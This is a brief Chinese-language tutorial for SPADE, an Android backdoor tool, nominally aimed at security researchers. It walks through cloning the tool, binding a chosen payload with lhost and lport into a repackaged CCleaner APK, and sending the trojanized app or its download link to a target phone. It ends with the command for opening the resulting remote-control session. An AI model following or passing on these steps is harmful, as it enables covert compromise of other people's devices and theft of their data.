SPADE,一款安卓手機的后門控制工具,安全研究人員可以以此了解和研究安卓后門原理。
首先,我們從網站www.apk4fun.com下載apk文件,如ccleaner。然后,我們安裝spade
git clone?https://github.com/suraj-root/spade.git
之后,利用以下命令開始捆綁惡意載體
?
./spade.py /root/Desktop/ccleaner.apk?
有6種不同payload可供選擇,設置完lhost和lport,將會生成惡意payload
選擇設置listener之后,一個新的apk生成了
好了,你可以向目標手機發送apk或下載鏈接了,apk程序安裝的同時,將會執行我們設置的惡意payload。
之后,通過命令查看實際控制效果
?
sessions –i 1
)
